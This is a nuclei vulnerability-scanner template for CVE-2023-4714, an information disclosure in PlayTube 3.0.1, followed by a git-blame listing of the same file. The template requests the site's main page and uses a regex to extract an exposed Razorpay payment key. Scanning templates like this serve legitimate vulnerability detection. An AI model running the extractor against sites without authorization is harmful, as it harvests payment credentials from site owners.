nuclei-templates/http/cves/2023/CVE-2023-4714.yaml

id: CVE-2023-4714

info:
  name: PlayTube 3.0.1 - Information Disclosure
  author: Farish
  severity: high
  description: |
    A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4714
    - https://www.exploitalert.com/view-details.html?id=39826
    - https://vuldb.com/?ctiid.238577
    - https://vuldb.com/?id.238577
    - https://github.com/Threekiii/Awesome-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-4714
    cwe-id: CWE-200
    epss-score: 0.68074
    epss-percentile: 0.97962
    cpe: cpe:2.3:a:playtube:playtube:3.0.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: playtube
    product: playtube
  tags: cve2023,cve,playtube,exposure

http:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "razorpay_options"
          - "PlayTube"
          - "key:"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        regex:
          - 'key: "([a-z_A-Z0-9]+)"'
# digest: 4a0a00473045022100c49434d3219e961bf9b3a2986f638e7217defeb346998ca398332577bb611a360220485c16c30e0970e454110ae41a21d5031534d48c954adceb05a6f5f92ba5f568:922c64590222798bb761d5b6d8e72950
Create CVE-2023-4714.yaml 2023-09-14 15:08:32 +00:00			`id: CVE-2023-4714`

			`info:`
info update 2023-09-15 16:41:27 +00:00			`name: PlayTube 3.0.1 - Information Disclosure`
Create CVE-2023-4714.yaml 2023-09-14 15:08:32 +00:00			`author: Farish`
			`severity: high`
			`description: \|`
Added Impact 2023-09-27 15:51:13 +00:00			`A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.`
			`impact: \|`
			`An attacker can exploit this vulnerability to gain access to sensitive information.`
Create CVE-2023-4714.yaml 2023-09-14 15:08:32 +00:00			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-4714`
			`- https://www.exploitalert.com/view-details.html?id=39826`
templateman update 2023-10-14 11:27:55 +00:00			`- https://vuldb.com/?ctiid.238577`
			`- https://vuldb.com/?id.238577`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`- https://github.com/Threekiii/Awesome-POC`
Create CVE-2023-4714.yaml 2023-09-14 15:08:32 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
templateman update 2023-10-14 11:27:55 +00:00			`cve-id: CVE-2023-4714`
Create CVE-2023-4714.yaml 2023-09-14 15:08:32 +00:00			`cwe-id: CWE-200`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.68074`
			`epss-percentile: 0.97962`
templateman update 2023-10-14 11:27:55 +00:00			`cpe: cpe:2.3:a:playtube:playtube:3.0.1:::::::*`
Create CVE-2023-4714.yaml 2023-09-14 15:08:32 +00:00			`metadata:`
info update 2023-09-15 16:41:27 +00:00			`verified: true`
Added Impact 2023-09-27 15:51:13 +00:00			`max-request: 1`
templateman update 2023-10-14 11:27:55 +00:00			`vendor: playtube`
			`product: playtube`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2023,cve,playtube,exposure`
Update CVE-2023-4714.yaml 2023-09-14 15:11:26 +00:00
Create CVE-2023-4714.yaml 2023-09-14 15:08:32 +00:00			`http:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}'`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "razorpay_options"`
			`- "PlayTube"`
matcher update 2023-09-15 16:42:25 +00:00			`- "key:"`
Create CVE-2023-4714.yaml 2023-09-14 15:08:32 +00:00			`condition: and`

			`- type: status`
			`status:`
			`- 200`

			`extractors:`
			`- type: regex`
			`part: body`
			`regex:`
			`- 'key: "([a-z_A-Z0-9]+)"'`
Auto Template Signing [Sat Jun 1 06:52:59 UTC 2024] :robot: 2024-06-01 06:53:00 +00:00			`# digest: 4a0a00473045022100c49434d3219e961bf9b3a2986f638e7217defeb346998ca398332577bb611a360220485c16c30e0970e454110ae41a21d5031534d48c954adceb05a6f5f92ba5f568:922c64590222798bb761d5b6d8e72950`